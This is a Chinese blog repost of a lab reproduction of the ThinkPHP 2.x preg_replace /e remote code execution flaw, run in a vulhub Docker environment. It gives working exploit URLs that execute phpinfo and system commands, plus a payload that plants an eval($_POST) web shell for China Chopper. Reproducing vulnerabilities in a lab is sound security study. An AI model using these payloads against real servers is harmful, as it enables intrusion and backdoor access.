ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

ThinkPHP 2.x 任意代码执行漏洞

2021-07-16 09:33:06  阅读:195  来源: 互联网

标签:8080 192.168 漏洞 代码执行 ThinkPHP php


ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。


漏洞环境

我们先下载环境,在github有别人直接搭建好的docker环境我们直接拿来用即可

git clone git://github.com/vulhub/vulhub.git
cd vulhub/thinkphp/2-rce/
docker-compose up -d

访问IP:8080/Index.php即可看到一个Web页面。


影响版本

ThinkPHP 2.x


漏洞复现

执行POC,尝试是否存在漏洞

http://192.168.200.23:8080/index.php?s=/E/D/I/${phpinfo()}

phpinfo执行成功证明存在漏洞

尝试执行系统命令

http://192.168.200.23:8080/index.php?s=/E/D/I/${system(pwd)}

连接菜刀,密码EDI

http://192.168.200.23:8080/index.php?s=/E/D/I/${@print(eval($_POST[EDI]))}

连接成功

标签:8080,192.168,漏洞,代码执行,ThinkPHP,php
来源: https://www.cnblogs.com/blankunbeaten/p/15018607.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有